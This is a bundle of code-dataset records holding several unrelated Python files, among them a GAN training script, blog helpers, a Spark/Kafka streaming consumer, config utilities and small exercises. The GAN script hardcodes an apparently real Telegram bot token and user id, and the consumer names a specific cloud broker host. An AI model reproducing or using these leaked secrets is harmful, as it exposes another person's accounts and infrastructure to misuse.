200\n","sub_path":"server/app/api/x.py","file_name":"x.py","file_ext":"py","file_size_in_byte":3570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"604713732","text":"import sys\nsys.path.append(\"src/\") \n\n\nimport os\nimport random\nimport numpy as np\nimport sklearn.datasets\nimport tensorflow as tf\nimport csv \nimport tensorflow_utils as tf_utils\nimport utils as utils\n\nimport pandas as pd\nfrom scipy import stats\n\nfrom typing import List\n\nfrom dataset_manager import DataSetManager\n\nfrom telegrad.dl_bot import DLBot\nfrom clr import CyclicLR\n\nfrom error_metrics import gan_error_all_species\n\n\ntelegram_token = \"753043252:AAG2wjtBKV9nlcv9VEjLDyoShzkTEjTKFzA\" # replace TOKEN with your bot's token\n\n# user id is optional, however highly recommended as it limits the access to you alone.\ntelegram_user_id = 780738092 # replace None with your telegram user id (integer):\n\n\"\"\"\n----------------8<-------------[ cut here ]------------------\n\n------------------------------------------------\n\"\"\"\ndef train_gan(train_set, indices: List, samples_per_N:int, repetition_n:int, identifier:str,experiment_name:str, batch_size: int =256, desired_epochs: int = 1000):\n \"\"\"\n The GAN is trained for 1000 epochs. If a a set of 60k samples is trained with a batchsize of 256,\n then a epoch equals 226 iterations. A budget of 100,000 iterations would equals to 426\n\n \"\"\"\n assert train_set.shape[0] > len(indices)\n\n print(train_set.shape)\n print(len(indices))\n\n my_ds = DataSetManager(train_set[indices])\n\n\n # print(\"Set number of iterations to train\\n\")\n v5 = (desired_epochs*(train_set[indices].shape[0]))//batch_size +1\n\n print(\"ITERS \"+str(v5))\n print(\"SIZE \"+str(train_set[indices].shape))\n\n\n # print(\"Use pretrained model? (0 means No, some number different to 0 means yes)\\n\")\n decision_number = 0 #int( input() )\n\n # print(\"Type a name to save the model with?\\n\")\n model_tag = str(round(samples_per_N)) +'_'+ str(repetition_n)\n \n\n storing_path = 'data/'+ experiment_name + \"/\" + model_tag + '_data/'\n model_path = storing_path+ model_tag + '.ckpt'\n \n # Recall that os.mkdir isn't recursive, so it only makes on directoryt at a time\n try:\n # Create target Directory\n os.mkdir(storing_path)\n print(\"Directory \" , storing_path , \" Created \") \n except FileExistsError:\n print(\"Directory \" , storing_path , \" already exists\")\n\n # ===> Auxiliar functions <=== \n \"\"\"\n ----------------8<-------------[ cut here ]------------------\n\n ------------------------------------------------\n \"\"\"\n def save_history(files_prefix, gen_loss_record,disc_loss_record, jsd_error, current_epoch, epoch_record,my_ds,iter_, epochs, global_iters ):\n # Save losses per epoch\n\n df = pd.DataFrame(np.array(gen_loss_record))\n with open(files_prefix+'_gen_loss.csv', 'w+') as f:\n df.to_csv(f, header=False, index=False)\n\n df = pd.DataFrame(np.array(disc_loss_record))\n with open(files_prefix+'_disc_loss.csv', 'w+') as f:\n df.to_csv(f, header=False, index=False)\n\n df = pd.DataFrame(np.array(epoch_record))\n with open(files_prefix+'_epoch_record.csv', 'w+') as f:\n df.to_csv(f, header=False, index=False)\n # Save current iter and epochs\n\n df = pd.DataFrame(np.array( [epochs + my_ds.epochs_completed, global_iters + iter_] ) ) \n\n with open(files_prefix+'_training.csv', 'w+') as f:\n df.to_csv(f, header=False, index=False)\n\n with open(files_prefix+'_jsd_error.csv', 'a') as csvFile:\n writer = csv.writer(csvFile)\n writer.writerow([current_epoch, jsd_error]) \n\n def send_bot_message(bot,my_ds, iter_, ITERS, identifier ):\n \"\"\" \n Not quite straighforward since the critic draws many more samples.\n\n \"\"\"\n\n message = \"\\nEpochs [\"+str(my_ds.epochs_completed)+\"] Iter: \"+str(iter_)+\";\\t\"+str(np.round(100* iter_/ITERS,2))+\"% \"\n message = message + identifier\n print(message)\n bot.set_status(message)\n # Send update message\n if bot.verbose:\n bot.send_message(message) \n\n print(\"\\n\")\n\n def save_gen_samples(gen_op, disc_op, sess,path, k, n = 4):\n \"\"\"\n k: is the number of epochs used to trained the generator\n n: is the number of batches to draw samples\n \"\"\"\n\n suffix = '_gen_samples_'+str(k)+'_epochs_'+'.csv'\n\n for k in range(n):\n\n samples = sess.run(gen_op)\n df = pd.DataFrame(np.array(samples))\n with open(path+suffix, 'a') as f:\n df.to_csv(f, header=False, index=False)\n\n # Score the samples using the critic\n scores = sess.run(disc_op)\n df = pd.DataFrame(np.array(scores))\n with open(path+'scores_'+suffix, 'a') as f:\n df.to_csv(f, header=False, index=False)\n\n # ===> Model Parameters <=== \n \"\"\"\n ----------------8<-------------[ cut here ]------------------\n\n ------------------------------------------------\n \"\"\"\n\n DIM = 512 # model dimensionality\n GEN_DIM = 100 # output dimension of the generator\n DIS_DIM = 1 # outptu dimension fo the discriminator\n FIXED_GENERATOR = False # wheter to hold the generator fixed at ral data plus Gaussian noise, as in the plots in the paper\n LAMBDA = .1 # smaller lambda makes things faster for toy tasks, but isn't necessary if you increase CRITIC_ITERS enough\n BATCH_SIZE = batch_size # batch size\n ITERS = v5 #100000 # how many generator iterations to train for\n FREQ = 250 # sample frequency\n \n \n CRITIC_ITERS = 5 # homw many critic iteractions per generator iteration\n\n\n def Generator_Softmax(n_samples, name='gen'):\n\n with tf.variable_scope(name):\n noise = tf.random_normal([n_samples, GEN_DIM])\n output01 = tf_utils.linear(noise, 3*DIM, name='fc-1')\n output01 = tf_utils.relu(output01, name='relu-1')\n \n output02 = tf_utils.linear(output01, 3*DIM, name='fc-2')\n output02 = tf_utils.relu(output02, name='relu-2')\n \n output03 = tf_utils.linear(output02, 3*DIM, name='fc-3')\n output03 = tf_utils.relu(output03, name='relu-3')\n\n output04 = tf_utils.linear(output03, GEN_DIM, name='fc-4')\n\n # Reminder: a logit can be modeled as a linear function of the predictors\n output05 = tf.nn.softmax(output04, name = 'softmax-1')\n\n return output05\n \n\n def Discriminator(inputs, is_reuse=True, name='disc'):\n with tf.variable_scope(name, reuse=is_reuse):\n print('is_reuse: {}'.format(is_reuse))\n output01 = tf_utils.linear(inputs, 3*DIM, name='fc-1')\n output01 = tf_utils.relu(output01, name='relu-1')\n\n output02 = tf_utils.linear(output01, 3*DIM, name='fc-2')\n output02 = tf_utils.relu(output02, name='relu-2')\n\n output03 = tf_utils.linear(output02, 3*DIM, name='fc-3')\n output03 = tf_utils.relu(output03, name='relu-3')\n\n output04 = tf_utils.linear(output03, DIS_DIM, name='fc-4')\n \n return output04\n \n real_data = tf.placeholder(tf.float32, shape=[None, GEN_DIM])\n fake_data = Generator_Softmax(BATCH_SIZE)\n\n disc_real = Discriminator(real_data, is_reuse=False)\n disc_fake = Discriminator(fake_data)\n\n disc_cost = tf.reduce_mean(disc_fake) - tf.reduce_mean(disc_real)\n gen_cost = - tf.reduce_mean(disc_fake)\n\n # WGAN gradient penalty parameters\n\n alpha = tf.random_uniform(shape=[BATCH_SIZE, 1], minval=0., maxval=1.)\n interpolates = alpha*real_data + (1.-alpha) * fake_data\n disc_interpolates = Discriminator(interpolates)\n gradients = tf.gradients(disc_interpolates, [interpolates][0])\n slopes = tf.sqrt(tf.reduce_sum(tf.square(gradients), reduction_indices=[1]))\n gradient_penalty = tf.reduce_mean((slopes - 1)**2)\n\n disc_cost += LAMBDA * gradient_penalty\n \n disc_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope='disc')\n gen_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope='gen')\n\n\n\n disc_lr = tf.placeholder(tf.float32, shape=()) # 1e-4\n gen_lr = tf.placeholder(tf.float32, shape=()) # 1e-4\n\n disc_train_op = tf.train.AdamOptimizer(learning_rate=disc_lr, beta1=0.5, beta2=0.9).minimize(disc_cost, var_list=disc_vars)\n\n if len(gen_vars) > 0:\n gen_train_op = tf.train.AdamOptimizer(learning_rate=gen_lr, beta1=0.5, beta2=0.9).minimize(gen_cost, var_list=gen_vars)\n else:\n gen_train_op = tf.no_op()\n\n\n \"\"\"\n ----------------8<-------------[ cut here ]------------------\n\n ------------------------------------------------\n \"\"\"\n # ===> Model Parameters <=== \n\n df = pd.DataFrame(np.array(indices))\n with open(storing_path+'training_indices.csv', 'a') as f:\n df.to_csv(f, header=False, index=False)\n\n \n session_saver = tf.train.Saver()\n\n # files_prefix = 'model/'+ model_tag \n\n if decision_number == 0:\n pre_trained = False\n\n gen_loss_record = [] # type: List[float]\n disc_loss_record = [] # type: List[float]\n epoch_record = [] # type: List[float]\n\n epochs = 0\n global_iters = 0\n\n else:\n pre_trained = True\n temp = pd.read_csv(storing_path+'_training.csv',header=None ).values\n \n epochs, global_iters = temp.flatten()\n\n my_ds.epochs_completed = epochs\n\n gen_loss_record = (pd.read_csv(storing_path+'_gen_loss.csv',header=None ).values).tolist()\n disc_loss_record = (pd.read_csv(storing_path+'_disc_loss.csv',header=None ).values).tolist()\n epoch_record = (pd.read_csv(storing_path+'_epoch_record.csv',header=None ).values).tolist()\n\n # Create a DLBot instance\n bot = DLBot(token=telegram_token, user_id=telegram_user_id)\n # Activate the bot\n bot.activate_bot()\n\n print(\"\\nTelegram bot has been activated \")\n\n\n iters_per_epoch = my_ds.num_examples/BATCH_SIZE\n\n total_iters = int(np.ceil((desired_epochs*iters_per_epoch)/CRITIC_ITERS))\n\n critic_iters = np.round((5/6)*total_iters)\n gen_iters = np.round((1/6)*total_iters)\n\n \n ITERS = total_iters\n\n # Train loop\n with tf.Session() as sess:\n \n if pre_trained == False: # false by default:\n sess.run(tf.global_variables_initializer())\n if pre_trained == True:\n # tf.reset_default_graph() \n session_saver.restore(sess,model_path)\n #\n # DUCK TAPE SOLUTION\n iter_ = 0\n\n \"\"\"\n while my_ds.epochs_completed < desired_epochs:\n iter_ +=1\n \"\"\"\n gen_lr_ = CyclicLR(base_lr=10**-4.72, max_lr=10**-3.72, step_size=gen_iters)\n disc_lr_ = CyclicLR(base_lr=10**-4.72, max_lr=10**-3.72, step_size=critic_iters)\n\n for iter_ in range(ITERS):\n batch_data, disc_cost_ = None, None\n \n previous_epoch = my_ds.epochs_completed \n\n # train critic\n for i_ in range(CRITIC_ITERS):\n batch_data = my_ds.next_batch(BATCH_SIZE) # data_gen.__next__()\n disc_cost_, _ = sess.run([disc_cost, disc_train_op], feed_dict={real_data: batch_data, disc_lr:disc_lr_.clr() })\n disc_lr_.on_batch_end()\n\n # train generator\n sess.run(gen_train_op, feed_dict={gen_lr : gen_lr_.clr()}) \n gen_lr_.on_batch_end()\n\n gen_cost2 = sess.run(gen_cost) \n\n current_epoch = my_ds.epochs_completed \n\n condition2 = current_epoch % 5 == 0\n if current_epoch > previous_epoch and condition2:\n disc_loss_record.append(disc_cost_)\n gen_loss_record.append(gen_cost2)\n epoch_record.append(my_ds.epochs_completed ) \n # print(\"Diff \"+str(current_epoch - previous_epoch))\n\n if (np.mod(iter_, FREQ) == 0) or (iter_+1 == ITERS):\n \n \"\"\"\n print(\"===> Debugging\")\n print(disc_loss_record)\n print(gen_loss_record)\n \"\"\"\n\n bot.loss_hist.append(disc_cost_)\n\n fake_samples = sess.run(fake_data) # , feed_dict={real_data: batch_data}\n # print(\"\\n==> Sum-Simplex condition: \" +str(np.sum(fake_samples, axis=1))) \n send_bot_message(bot,my_ds, iter_, ITERS, identifier)\n\n jsd_error = gan_error_all_species(fake_samples, train_set)\n current_epoch = my_ds.epochs_completed\n\n session_saver.save(sess, model_path)\n save_history(storing_path, gen_loss_record,disc_loss_record, jsd_error, current_epoch, epoch_record, my_ds,iter_, epochs, global_iters )\n\n \n # save_gen_samples(fake_data, disc_fake ,sess, storing_path, k) # fake_data = Generator_Softmax(BATCH_SIZE)\n \n\n utils.tick() # _iter[0] += 1\n\n if iter_ == ITERS:\n session_saver.save(sess, model_path)\n \n # Create gan samples\n n_samples = len(indices)\n\n k_iter = n_samples//BATCH_SIZE +1\n\n gan_samples_path = storing_path+\"gan_samples_\" +model_tag+'.csv'\n\n for k in range(k_iter):\n fake_samples = sess.run(fake_data)\n\n df = pd.DataFrame(fake_samples)\n with open(gan_samples_path, 'a') as f:\n df.to_csv(f, header=False, index=False)\n\n # Clear variables valuies\n\n tf.reset_default_graph()\n\n current_epoch = my_ds.epochs_completed\n save_history(storing_path, gen_loss_record,disc_loss_record, jsd_error, current_epoch, epoch_record, my_ds,iter_, epochs, global_iters ) \n\n bot.stop_bot()\n\n print(\"Training is done\")\n\n # Duct tapping the size of gan sample set to avoid changing the TF Graph\n\n temp1 = pd.read_csv(gan_samples_path, header=None).values\n temp1 = temp1[0:n_samples]\n df = pd.DataFrame(temp1)\n\n with open(gan_samples_path, 'w+') as f:\n df.to_csv(f, header=False, index=False)\n\n\n print(\"Training is done\")\n","sub_path":"architectures/3N_faster_gan/train_dirichlet_interface.py","file_name":"train_dirichlet_interface.py","file_ext":"py","file_size_in_byte":14017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"2402983","text":"import os\nimport csv\nimport collections\n\ndef yieldFiles(directoryPath):\n for file in os.listdir(directoryPath):\n yield os.path.join(directoryPath, file)\n\ndef yieldLines(filePath):\n with open(filePath, newline=\"\\n\") as tsv:\n for line in tsv:\n token, count = line.split(\"\\t\")\n yield token, int(count.strip())\n\ndef writeFreqDict(directoryPath, outputPath):\n freqDict = collections.defaultdict(int)\n\n for filePath in yieldFiles(directoryPath):\n for word, count in yieldLines(filePath):\n freqDict[word.lower()] += int(count)\n\n with open(outputPath, \"w\") as out:\n for word, count in freqDict.items():\n out.write(f\"{word}\\t{count}\\n\")\n","sub_path":"src/hathi_parsing.py","file_name":"hathi_parsing.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"159296136","text":"import view\nimport datetime\nimport blog\n\nfrom google.appengine.ext.webapp import template\nfrom google.appengine.ext import db\nfrom google.appengine.api import memcache\n\n\ndef with_page(funct):\n \"\"\"Credits: http://blog.notdot.net/\"\"\"\n def decorate(self, page_slug=None):\n page = None\n if page_slug is not None:\n page = get_page(page_slug)\n if page is None:\n view.Renderer().render_error(self, 404)\n return\n funct(self, page)\n return decorate\n\ndef with_post(funct):\n \"\"\"Credits: http://blog.notdot.net/\"\"\"\n def decorate(self, year=None, month=None, day=None, slug=None):\n post = None\n if slug is not None:\n post = get_post(year, month, day, slug)\n if post is None:\n view.Renderer().render_error(self, 404)\n return\n funct(self, post)\n return decorate\n\ndef with_link(funct):\n \"\"\"Credits: http://blog.notdot.net/\"\"\"\n def decorate(self, year=None, month=None, day=None, slug=None):\n link = None\n if slug is not None:\n link = get_link(year, month, day, slug)\n if link is None:\n view.Renderer().render_error(self, 404)\n return\n funct(self, link)\n return decorate\n\ndef markdown(text, **kwargs):\n \"\"\"Converts given `text` to html using python-markdown.\n\n This is meant to centralize markdown usage throughout Bizarrice.\n Keyword list arguments:\n * extensions: replaces every preset extension for the ones given.\n * extra: appends given extensions to the preset list.\n Every other initialization keyword argument for python-markdown is\n accepted and passed without validation. Use with care.\"\"\"\n import import_wrapper\n import_wrapper.fix_sys_path()\n from markdown import Markdown\n extensions = kwargs.pop('extensions', False) or ['extra', 'codehilite',\n 'toc']\n extensions += kwargs.pop('extra', [])\n md = Markdown(extensions=extensions, **kwargs)\n return md.convert(text)\n\ndef slugify(value):\n \"\"\"\n Adapted from Django's django.template.defaultfilters.slugify.\n \"\"\"\n import re\n import unicodedata\n value = unicodedata.normalize('NFKD', value).encode('ascii', 'ignore')\n value = unicode(re.sub('[^\\w\\s-]', '', value).strip().lower())\n return re.sub('[-\\s]+', '-', value)\n\ndef get_post(year, month, day, slug): #{{{\n cached_id = 'post/%s/%s/%s/%s' % (year, month, day, slug)\n post = memcache.get(cached_id)\n if post is None:\n year = int(year)\n month = int(month)\n day = int(day)\n\n # Build the time span to check for the given slug\n start_date = datetime.datetime(year, month, day)\n time_delta = datetime.timedelta(days=1)\n end_date = start_date + time_delta\n\n # Create a query to check for slug uniqueness in the specified time span\n query = blog.Post.all()\n query.filter('pub_date >= ', start_date)\n query.filter('pub_date < ', end_date)\n query.filter('slug = ', slug)\n post = query.get()\n memcache.set(cached_id, post)\n return post\n#}}}\n\ndef get_link(year, month, day, slug): #{{{\n cached_id = 'link/%s/%s/%s/%s' % (year, month, day, slug)\n link = memcache.get(cached_id)\n if link is None:\n year = int(year)\n month = int(month)\n day = int(day)\n\n # Build the time span to check for the given slug\n start_date = datetime.datetime(year, month, day)\n time_delta = datetime.timedelta(days=1)\n end_date = start_date + time_delta\n\n # Fetch the link based on the timespan\n query = blog.Link.all()\n query.filter('pub_date >= ', start_date)\n query.filter('pub_date < ', end_date)\n query.filter('slug = ', slug)\n link = query.get()\n memcache.set(cached_id, link)\n return link\n#}}}\n\ndef get_page(slug): #{{{\n page = memcache.get('page-%s' % slug)\n if page is None:\n query = blog.Page.all()\n query.filter('slug = ', slug)\n page = query.get()\n memcache.set('page-%s' % slug, page)\n return page\n#}}}\n\ndef get_archive_list():\n \"\"\"Return a list of the archive months and their article counts.\"\"\"\n import import_wrapper\n import_wrapper.load_zip('dateutil')\n from dateutil.relativedelta import relativedelta\n\n # Attempt to get a memcache'd copy first\n archive = memcache.get('archive_list')\n if archive is not None:\n return archive\n\n # Get the date of the oldest entry\n query = db.Query(blog.Publishable)\n query.order('pub_date')\n oldest = query.get()\n\n # Handle the situation where there are no posts\n if oldest is None:\n memcache.set('archive_list', [])\n return []\n\n # Create a date delta for moving ahead 1 month\n plus_one_month = relativedelta(months=+1)\n\n # Calculate the start and end dates for the archive\n start_date = datetime.date(oldest.pub_date.year, oldest.pub_date.month, 1)\n end_date = datetime.date.today()\n end_date = datetime.date(end_date.year, end_date.month, 1) + plus_one_month\n\n # Loop through each month in the time span and count the number\n # of entries made in that month\n archive = []\n current_date = start_date\n while current_date < end_date:\n next_date = current_date + plus_one_month\n\n query = db.Query(blog.Publishable)\n query.filter('pub_date >= ', current_date)\n query.filter('pub_date < ', next_date)\n\n archive.append({\n 'date': current_date,\n 'count': query.count(1000),\n 'url': '/%04d/%02d' % (current_date.year, current_date.month),\n })\n current_date = next_date\n\n memcache.set('archive_list', archive)\n return archive\n\ndef get_tag_list():\n \"\"\"Return a list of the tags and their article counts\"\"\"\n # Attempt to get a memcache'd copy first\n tag_list = memcache.get('tag_list')\n if tag_list is not None:\n return tag_list\n\n # Build a list of tags and their article counts\n tag_list = {}\n query = blog.Post.all()\n for post in query:\n for tag in post.tags:\n if tag in tag_list:\n tag_list[tag] += 1\n else:\n tag_list[tag] = 1\n\n # Sort the tag dictionary by name into a list\n # and add each tag's URL\n sorted_tag_list = []\n for tag in sorted(tag_list.iterkeys()):\n sorted_tag_list.append({\n 'tag': tag,\n 'count': tag_list[tag],\n 'url': '/tag/%s' % (tag),\n })\n\n memcache.set('tag_list', sorted_tag_list)\n return sorted_tag_list\n\ndef get_page_list():\n pages = memcache.get('page_list')\n if pages is not None:\n return pages\n\n page_list = []\n page_list = blog.Page.all().order('index').fetch(1000)\n memcache.set('page_list', page_list)\n return page_list\n","sub_path":"blog/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"479921774","text":"from gsrest.db import get_connection\nfrom openapi_server.models.block import Block\nfrom openapi_server.models.blocks import Blocks\nfrom openapi_server.models.tx import TxAccount\nfrom openapi_server.models.block_tx_utxo import BlockTxUtxo\nfrom gsrest.util.values import convert_value\nfrom gsrest.service.rates_service import get_rates\nfrom flask import Response, stream_with_context\nfrom gsrest.util.csvify import create_download_header, to_csv\n\n\ndef from_row(currency, row, rates):\n if currency == 'eth':\n return TxAccount(\n tx_hash=row.hash.hex(),\n timestamp=row.block_timestamp,\n height=row.block_number,\n values=convert_value(currency, row.value, rates))\n return BlockTxUtxo(\n no_inputs=row.no_inputs,\n no_outputs=row.no_outputs,\n total_input=convert_value(currency, row.total_input, rates),\n total_output=convert_value(currency, row.total_output, rates),\n tx_hash=row.tx_hash.hex())\n\n\ndef block_from_row(currency, row):\n if currency == 'eth':\n return Block(\n height=row.number,\n block_hash=row.hash.hex(),\n no_txs=row.transaction_count,\n timestamp=row.timestamp)\n return Block(\n height=row.height,\n block_hash=row.block_hash.hex(),\n no_txs=row.no_transactions,\n timestamp=row.timestamp)\n\n\ndef get_block(currency, height):\n db = get_connection()\n row = db.get_block(currency, height)\n if not row:\n raise RuntimeError(\"Block {} not found\".format(height))\n return block_from_row(currency, row)\n\n\ndef list_blocks(currency, page=None):\n db = get_connection()\n results, paging_state = db.list_blocks(currency, page)\n block_list = [block_from_row(currency, row)\n for row in results.current_rows]\n\n return Blocks(paging_state, block_list)\n\n\ndef list_block_txs(currency, height):\n db = get_connection()\n txs = db.list_block_txs(currency, height)\n\n if txs is None:\n raise RuntimeError(\"Block {} not found\".format(height))\n rates = get_rates(currency, height)\n\n return [from_row(currency, tx, rates['rates'])\n for tx in txs]\n\n\ndef list_block_txs_csv(currency, height):\n def query_function(_):\n result = list_block_txs(currency, height)\n txs = [tx.to_dict() for tx in result]\n return None, txs\n return Response(stream_with_context(to_csv(query_function)),\n mimetype=\"text/csv\",\n headers=create_download_header(\n 'transactions of block {} ({}).csv'\n .format(height, currency.upper())))\n","sub_path":"gsrest/service/blocks_service.py","file_name":"blocks_service.py","file_ext":"py","file_size_in_byte":2683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"522773007","text":"from __future__ import print_function\n\nimport sys\n\nfrom pyspark import SparkContext\nfrom pyspark.streaming import StreamingContext\nfrom pyspark.streaming.kafka import KafkaUtils\n\nfrom pyspark.sql import SQLContext\nfrom pyspark.sql.types import *\n\n\nimport json\n\ndef process_RDD(RDD):\n lines = RDD.collect()\n for line in lines:\n process_line(line)\n #RDD.foreach(process_line)\n\ndef process_line(line):\n line = line.rstrip()\n fields = json.loads(line)\n try:\n target_id = fields['transactions'][0]['target']['id']\n actor_id = fields['actor']['id']\n message = fields['message']\n target_name = fields['transactions'][0]['target']['name']\n actor_name = fields['actor']['name']\n time = fields['updated_time']\n payment_id = fields['payment_id']\n# payment_id.pprint() \n transaction = sqlContext.createDataFrame([(payment_id,actor_id,message,target_id,time),], [\"payment_id\",\"actor_id\",\"message\",\"target_id\",\"time\"])\n user = sqlContext.createDataFrame([(target_id,target_name),(actor_id,actor_name),], [\"id\",\"name\"])\n user.show()\n transaction.write.format(\"org.apache.spark.sql.cassandra\").mode('append').options(table=\"transactions\", keyspace=\"venmo_streaming\").save()\n user.write.format(\"org.apache.spark.sql.cassandra\").mode('append').options(table=\"user\", keyspace=\"venmo_streaming\").save()\n except:\n pass\n#\n\nif __name__ == \"__main__\":\n\n\n sc = SparkContext(appName=\"PythonStreamingDirectKafkaWordCount\")\n sqlContext = SQLContext(sc)\n\n\n# file_graph_obj = open(\"/home/ubuntu/Graph/venmo_1370291832.json\",'r')\n\n# for line in file_graph_obj.readlines(20):\n# process_line(line)\n\n# exit()\n\n\n ssc = StreamingContext(sc, 2)\n brokers = \"ec2-52-40-166-123.us-west-2.compute.amazonaws.com:9092\"\n topic = \"venmo2\"\n\n kvs = KafkaUtils.createDirectStream(ssc, [topic], {\"metadata.broker.list\": brokers})\n lines = kvs.map(lambda x: x[1])\n# count2=lines.count()\n# lines.pprint()\n lines.foreachRDD(process_RDD)\n\n #count2.pprint()\n\n ssc.start()\n ssc.awaitTermination()\n\n\n","sub_path":"util/streaming_consumer.py","file_name":"streaming_consumer.py","file_ext":"py","file_size_in_byte":2122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"289020995","text":"def create_email_response(orders):\n body = [summarize(order) for order in orders] if orders else [ERROR_MESSAGE]\n return '\\n\\n'.join((\"Sehr geehrte Kundin / Kunde\", *body, 'Vielen dank'))\n\ndef summarize(order):\n resp = [\n f'Die Bestellung mit Ordnungsnummer {order.po} hat jetzt folgende Positionen: {order.positions}.']\n if \"elk\" in order.categories:\n resp.append('Endlieferung wurde gesetzt.')\n if \"erk\" in order.categories:\n resp.append('Endrechnung wurde gesetzt.')\n resp.append('Die Bestellung ist immer noch offen.' if order.is_open else 'Bestellung ist jetzt geschlossen.')\n\n return '\\n'.join(resp)\n\nERROR_MESSAGE = \"\"\"leider haben wir keine gueltige Produktbestellungnummern von Ihnen erhalten.\nEin Produktbestellungnummer besteht aus 10-stelligem Ziffer.\nBitte bepruefen Sie nochmal Ihre Produktbestellung.\"\"\"\n","sub_path":"MainService/gpt3/create_email_from_json.py","file_name":"create_email_from_json.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"129957341","text":"import os\nimport configparser\n\n\ndef load_config(config_path):\n config = None\n if os.path.isfile(config_path):\n config = configparser.ConfigParser()\n try:\n config.optionxform = str\n config.read(config_path)\n except:\n print(\"Error reading config file\")\n else:\n print(\"Error, config file does not exist\")\n return config\n\n\ndef save_config(config, config_path):\n with open(config_path, \"w\") as cfg:\n try:\n config.write(cfg)\n except:\n print(\"Error writing config file\")\n\n\ndef load_user(config, user_name):\n user_items = None\n try:\n user_items = dict(config.items(user_name))\n except:\n print(\"Error loading user credentials\")\n return user_items\n\n\ndef add_user(config, user_name, config_path):\n if user_name not in config.sections():\n try:\n config.add_section(user_name)\n except:\n print(\"Error adding new user section, for user_name \" + user_name)\n else:\n print(\"Error, user \" + user_name + \" already exists\")\n save_config(config, config_path)\n\n\ndef set_user_items(config, user_name, user_items):\n for key in list(user_items.keys()):\n try:\n config.set(user_name, key, user_items[key])\n except:\n print(\"Error setting config key \" + key + \" with value \" +\n str(user_items[key]) + \" for user_name \" + user_name)\n return config\n\n\ndef update_config(config_path, user_name, user_items):\n config = load_config(config_path)\n if user_name not in config.sections():\n add_user(config, user_name, config_path)\n config = set_user_items(config, user_name, user_items)\n save_config(config, config_path)\n\n\ndef create_config(config_path):\n if not os.path.isdir(os.path.dirname(config_path)):\n os.makedirs(os.path.dirname(config_path))\n open(config_path, 'a').close()\n","sub_path":"tests/utils/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"444648633","text":"from json import encoder\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nfrom disease.paralleldt import dt\nfrom django.views.decorators.csrf import csrf_exempt\nimport json\nimport pandas as pd\nimport disease.inbuilt as inbuilt\nfrom disease.naivebayes import soln\nfrom disease.knn import knn\nfrom disease.decisiontree import decisiontree\nimport operator\n# Create your views here.\ndef home(request):\n return render(request,'diagnose/newindex.html')\n\n\n@csrf_exempt\ndef diangnose(request):\n symp=request.POST.get(\"symptoms\")\n s=symp.split(',')\n sys=[]\n i=0\n df=pd.read_csv(\"disease/Training.csv\",header=0)\n cols=list(df.columns)[:-1]\n while(i4):\n for i in range(len(top_diseases)-4):\n top_diseases.popitem()\n print(\"top-disease : \", top_diseases)\n\n # print(\"Values : \", list(top_diseases.values()))\n # print(\"Keys : \", list(top_diseases.keys()))\n\n\n vals = [round(val,2) for val in top_diseases.values() ]\n context['top_diseases'] = {'diseases': dict(zip(list(top_diseases.keys()),vals)), 'names': json.dumps(list(top_diseases.keys())), 'scores':list(top_diseases.values())}\n print(context)\n return render(request, 'diagnose/diagnosedashextended.html', context)\n\ndef diangnose2(request):\n symp=request.POST.get(\"symptoms\")\n s=symp.split(',')\n sys=[]\n i=0\n df=pd.read_csv(\"disease/Training.csv\",header=0)\n cols=list(df.columns)[:-1]\n while(i> sum_all([1,2,3,4,5])\n\n실행결과:\n15\n\n\"\"\"\n\ndef sum_all(list):\n x = 0\n for i in list:\n x += i\n print(x)\n\nsum_all([1,2,3,4,5])\n\n\n# 2. 인자로 전달된 리스트에 저장되어 있는 모든 값들을 역순으로 출력하는 함수를 만들어보자. 일례로 다음과 같은 실행결과를 보여야 한다.\n\n\"\"\"\n>> show_reverse([1,2,3,4,5])\n\n실행결과:\n5 4 3 2 1\n\n\n>> show_reverse(\"ABCDEFG\")\n\n실행결과:\nG F E D C B A\n\n\"\"\"\n\ndef show_reverse(list):\n for i in range(1, len(list)+1):\n print(list[-i], end=' ')\n\nshow_reverse([1,2,3,4,5])\nprint('\\r')\nshow_reverse(\"ABCDEFG\")\n\n","sub_path":"EX_05-4.py","file_name":"EX_05-4.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"30065642","text":"#!/usr/bin/python3\nimport sys\n\nargv = sys.argv[1:]\nargc = len(argv)\n\ntxt_arguments = 's' if argc != 1 else ''\nend_string = ':' if argc > 0 else '.'\n\nif __name__ == '__main__':\n print('{} argument{}{}'.format(argc, txt_arguments, end_string))\n\n if argc == 0:\n exit(0)\n\n for i, arg in enumerate(argv, start=1):\n print('{}: {}'.format(i, arg))\n","sub_path":"0x02-python-import_modules/2-args.py","file_name":"2-args.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"469958057","text":"#!/usr/bin/env python\n\nimport rospy\nfrom geometry_msgs.msg import PoseStamped\nfrom styx_msgs.msg import Lane, Waypoint\n\nimport math\n\nfrom geometry_msgs.msg import TwistStamped\nfrom std_msgs.msg import Int32\n\nimport sys\nimport tf\n\nfrom utilities.kdtree import kdtree\nfrom utilities.hysteresis import hysteresis\n\n\n'''\nThis node will publish waypoints from the car's current position to some `x` distance ahead.\nAs mentioned in the doc, you should ideally first implement a version which does not care\nabout traffic lights or obstacles.\nOnce you have created dbw_node, you will update this node to use the status of traffic lights too.\nPlease note that our simulator also provides the exact location of traffic lights and their\ncurrent status in 